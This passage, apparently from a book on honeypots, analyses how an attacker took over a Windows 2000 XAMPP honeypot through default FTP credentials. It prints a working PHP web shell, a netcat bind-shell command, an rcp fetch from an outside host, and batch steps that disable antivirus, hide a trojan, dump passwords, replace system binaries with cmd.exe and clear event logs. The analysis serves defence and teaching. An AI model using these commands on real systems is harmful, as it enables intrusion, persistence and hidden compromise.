As a second example of an attack against a high-interaction honeypot we take a closer look at a compromise of a honeypot running Windows 2000 Service Pack 2. This honeypot was on the latest patch level for the operating system, and all patches issued by Microsoft were installed. Thus, it cannot be easily compromised by automated attacks by worms or autonomous spreading malware. To offer some bait for an attacker, we installed again some web applications on the honeypot. This time we choose XAMPP version 1.5.5, an easy-to-install Apache distribution containing the tools Apache 2.2.3, MySQL 5.0.27, PHP 5.2.0 and PHP 4.4.4, phpMyAdmin 2.9.1.1, FileZilla FTP Server 0.9.20, and OpenSSL 0.9.8d.
As you can see, all applications are on a fairly recent version and thus should be rather secure. XAMPP itself is designed for a development environment, and the installation notes clearly mention that XAMPP should not be used in a production environment [109]:
XAMPP is configured to be as open as possible and to allow the web developer anything he/she wants. For development environments this is great but in a production environment it could be fatal.
Here a list of missing security in XAMPP:
The MySQL administrator (root) has no password.
The MySQL daemon is accessible via network.
PhpMyAdmin is accessible via network.
Examples are accessible via network.
The user of Mercury and FileZilla are known.
Please secure XAMPP before publishing anything online.
Thus, the individual software tools are secure, but due to insecure configuration, the whole system is vulnerable to attacks. This is a common phenomenon in IT security, and we wanted to see whether this can also lead to interesting observations.
You could use a similar honeypot setup to protect your server: deploy a fairly secure honeypot near your valuable boxes (preferably in a separate VLAN) and closely monitor what happens. Again, this can be some kind of burglar alarm and help you to identify the reconnaissance phase of an attack against you.
The attacker managed to access the FTP server provided by XAMPP using a default login and password. Via several steps, he gained access to the Windows command shell and then uploaded his own toolkit. It contains several common attack tools like a Trojan Horse with the capability to hide certain files, a keylogger, or a vulnerability scanner. With the help of an automated setup procedure, he installs all tools on the honeypot and then tries to attack other systems. This is, however, successfully blocked by the Honeywall.
11:18:26 PM: The host with IP address 66.70.XXX.XXX connects to the honeypot on TCP port 21. It tries to log in the FTP server with username ftp and password ftp@ftp.net. This login fails, since no such user exists on the system, and anonymous login is not allowed.
11:18:37 PM: The second login attempt from the same IP address. This time the credentials anyone and anyone@any.net are used. However, this attempt also fails.
11:18:45 PM: A third attempt to log in to the FTP server occurs. The attacker uses this time the username newuser and password wampp. This login is successful! This is an example of an insecure default configuration.
11:30:17 PM: The host with IP address 67.122.XXX.XXX (please note the different IP address compared to the first login) first connects to TCP port 80 and retrieves the website. It then logs in the FTP server with credentials newuser and wampp. The attacker searches for the file shell.php, but this file is not available at the machine. He then uploads this file via the command STOR shell.php. This is again an example of an insecure default configuration. The default user can upload arbitrary content to the server.
11:30:43 PM: The attacker accesses the uploaded file shell.php and uses a HTTP POST request to send the string -cmd=dir to the PHP script. As a return value, the scripts sends back a directory listing to the attacker. As you can see, the attacker can now execute arbitrary commands on the compromised machine by passing them to shell.php via -cmd=<COMMAND>.
11:30:56 PM: The backdoor via shell.php is used to execute the command -cmd=net+start. It returns a listing of all services started by Windows.
11:31:05 PM: Again, the attacker connects to the FTP server and logs in with the default username and password. Similar to before, he first checks whether the file nc.exe exists, and since it is not there, he uploads it via the STOR command. nc.exe is a Windows version of netcat, a tool for arbitrary network connections.
11:31:12 PM: Via the PHP shell backdoor, the uploaded file nc.exe is started. The attacker uses a HTTP POST request with the following parameters to issue a command: -cmd=nc.exe+-L+-p+7988+-e+cmd.exe. These instructions execute the program netcat. The tool listens (parameter -L) on TCP port 7988 (-p 7988) and executes the command cmd.exe once a TCP connection is established on this network port.
11:31:14 PM: The attacker connects to the honeypot on TCP port 7988. Due to the previous command, he now interacts with cmd.exe, the Windows command shell. The attacker quickly examines the system and lists various directories. Finally, he changes to the directory C:\Programme\xampp\htdocs.
11:31:45 PM: Via the command rcp -b 67.172.XXX.XXX. droppunx:drop.exedrop.exe the attacker tries to copy the file drop.exe from the remote host. rcp is the remote copy program that comes with Windows, similar to the older rcp on Unix-based systems. However, this transfer fails. He then uploads the tool via FTP STOR. With the help of the remote command shell, he navigates to the directory C:\WinNT\system32\wins and moves the file drop.exe there.
11:32:58 PM: The attacker executes the file drop.exe. This file is a self-extracting archive, and it unpacks itself to C:\WinNT\system32\wins. Afterward, he retrieves a listing of the directory content:
Code View: 02.10.2006 21:50 1.102 bye.txt 05.06.2005 14:56 3.584 CL.exe 09.07.2005 02:02 1.124 clearlogs.bat 01.10.2001 18:30 1.125.392 csrsrv.exe 23.08.2001 05:00 31.232 csx.exe 01.10.2001 18:30 928 d3dix8_23.dll 27.09.2005 15:05 10.835 DFind.exe 02.10.2006 21:49 437 dir.txt 13.08.2004 00:14 2.761 dllhost.exe 12.12.2006 02:12 1.519.855 drop.exe 19.09.2006 19:46 3.723 install.bat 01.10.2001 18:30 843.776 libeay32.dll 02.10.2006 21:48 2.219 log.txt 01.10.2001 18:30 963 mouseserv.drv 27.02.2006 17:24 65.536 pwdump2.exe 05.06.2005 14:56 36.864 samdump.dll 05.12.2005 09:29 38.912 srv.exe 01.10.2001 18:30 159.744 ssleay32.dll 02.10.2006 21:05 1.840 usb.vxd 21.10.2004 15:06 77.824 winfw.exe 20 File(s) 3.928.651 Bytes 2 Directories, 1.990.025.216 Bytes Free |
As you can see, drop.exe extracted 19 files in the directory. We will take a closer look at some of these files in the next paragraph.
In the following, the compromised host tries to attack other computers in the local network. This is blocked via the Honeywall, and eventually the network access of the honeypot is blocked due to excessive traffic via the Data Control mechanism. At the next morning, the honeypot was shut down and analyzed offline.
shell.php: This was the first file uploaded by the attacker. It provides him with a backdoor that he can access via the web. This is a clever way to get remote control of the honeypot. At the beginning, the attacker can only upload arbitray files, but he cannot execute any commands. He uploads the file shell.php with the following content:
<? $cmd = $_REQUEST["-cmd"]; ?> <html> <head><title>help.php</title></head> <onLoad="document.forms[0].elements[-cmd].focus()"> <form method=POST><br> <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"> <hr><pre> <? if($cmd != "") print Shell_Exec($cmd); ?> </pre> </form></body> </html> |
The parameter -cmd is assigned to the variable cmd. If cmd is not empty, it is then passed to the function Shell_Exec, a PHP function that executes commands via a shell and returns the complete output as a string. The return value is then printed, allowing the attacker to see it via the website. Thus, the attacker can now execute commands of his choice.
nc.exe: Netcat, commonly abbreviated as nc.exe, is the "TCP/IP Swiss army knife" according to the man page. It is a simple yet powerful tool to read and write data across network connections. It can be used to transfer data from one host to another, to bind executables to a port, and perform many other use cases. Netcat was originally developed for Unix-based system, but it is also available for Windows and the attacker used that version.
drop.exe: This self-extracting archive contains a complete tool-suite for the attacker. Upon execution, the file extracts 19 other files, among them Trojan Horses, rootkits, password dumper, and many others. The important part of this file is the included batch file, install.bat. It is executed after the extraction has finished and controls the installation process.
install.bat: This batch file is responsible for installing all tools used by the attacker and the most important one since it sets up everything. We briefly describe the main steps. At first, it stops several antivirus engines on the system via srv stop:
srv stop "sophos anti-virus network" srv stop "Microsoft NetWork FireWall Services" srv stop "Norton AntiVirus Server" [...] |
This way, common antivirus engines are disabled, and the installation routine can continue. The script then moves several files into the Windows system folder and changes the attributes of some of them.
[...] move dir.txt %windir%\system32\dhcp move usb.vxd %windir%\system32\drivers move csrsrv.exe %windir%\system32 move mouseserv.drv %windir%\system32 move d3dix8_23.dll %windir%\system32 attrib +h +s -r %windir%\system32\csrsrv.exe attrib +h +s -r %windir%\system32\drivers\usb.vxd [...] |
This is the actual installation procedure. The important files from the attacker are copied to the system32 folder and hidden. The attacker then uses a Trojan Horse with rootkit capabilities to hide the presence of some files. The Trojan with the file name csrsrv.exe is installed by the batch file and then the corresponding Windows service is started:
%windir%\system32\csrsrv.exe -install %windir%\system32\csrsrv.exe /h /i srv start COMSrv net1 start COMSrv |
To have remote access to the infected machine, the Trojan Horse also needs to send out and receive network packets. Thus, the attacker enables via winfw a default policy for the Windows firewall:
winfw app add c:\windows\system32\csrsrv.exe /name:"COM+ Base Service" winfw app add c:\winnt\system32\csrsrv.exe /name:"COM+ Base Service" winfw app set /name:"COM+ Base Service" /enable |
The batch file then executes the binary pwdump2, a password dumper. This executable should print out the passwords, but this fails in the current situation, since the attacker does not have enough privileges to execute it.
pwdump2.exe >> pass.txt
The installat.bat then copies some Windows binaries to other locations and overwrites the original binaries with cmd.exe, the Windows command shell.
rename %windir%\system32\ftp.exe shellsc.exe rename %windir%\system32\rcp.exe shellsd.exe rename %windir%\system32\net.exe win32sl.exe rename %windir%\system32\net1.exe win32slc.exe copy %windir%\system32\cmd.exe %windir%\system32\ftp.exe /y copy %windir%\system32\cmd.exe %windir%\system32\tftp.exe /y copy %windir%\system32\cmd.exe %windir%\system32\rcp.exe /y copy %windir%\system32\cmd.exe %windir%\system32\net1.exe /y copy %windir%\system32\cmd.exe %windir%\system32\net.exe /y |
The attacker presumably wants to be sure that he has access to the Windows command shell in several different ways. Next, he uses the tool cacls.exe to modify the file access control lists (ACLs):
%windir%\system32\cacls.exe cacls.exe /E /C /P SYSTEM:N /y
The parameter /E edits the ACL instead of replacing it, /C ignores errors, /P replaces SYSTEM's access permission with NONE and /y should answer "Yes" to any question (however, this is not supported in this version of cacls.exe.) This command thus revokes the ACL permission of SYSTEM on the binary itself.
Next, the attacker uses a logfile cleaner to hide his traces:
CL.exe 1 CL.exe 2 CL.exe 3 |
CL.exe first removes the application (parameter 1), then security (parameter 2), and finally system log files (parameter 3). This is no stealth but an efficient way to remove the traces caused by the attack.
Next, the batch file starts all disabled antivirus engines again. All important files from the attacker are hidden with the help of the Trojan Horse, and thus he enables everything again:
[...] srv start "NAV Auto-Protect" srv start "NAV Alert" srv start "eTrust InoculateIT Job Server" [...] |
Then the Windows service started by the Trojan Horse is configured to restart, and several dependencies are introduced to make the cleanup procedure harder:
c:/winnt/system32/csx.exe failure COMSrv reset=1 actions=restart/10 c:/windows/system32/csx.exe failure COMSrv reset=1 actions=restart/10 csx.exe config COMSrv error=ignore csx.exe failure COMSrv actions=restart/500 reset=10 csx.exe config lanmanserver depend=COMSrv csx.exe config lanmanworkstation depend=COMSrv |
The vulnerability scanner Dfind.exe is then used to scan the local system with a banner scan — that is, just grabbing all banners displayed by network services. This is the final check to see whether everything is working as expected:
start Dfind.exe -ban 1 65535 127.0.0.1 2500
Dfind also has the capability to exploit other systems, but this is not used in this case. Finally, the batch file deletes some files that are not useful anymore and then finishes the installation process:
[...] del pwdump2.exe del samdump.dll del dllhost.exe |
The other files uploaded by the attacker include another Trojan Horse and a keylogger. We refrain from describing them in more detail, since they are not used by the attacker during this attack.
The attacker seems to be a little experienced. He knows what to look for and has his own, well-prepared toolkit to quickly overtake the compromised system. He knew the default password of XAMPP and then quickly had a command shell on the honeypot.
With the tool Dfind, he then scanned the local network for other vulnerable machines. This was picked up and blocked by the Honeywall. Based on this proceeding, we can guess that the attacker used the compromised system as a stepping stone to attack other machines.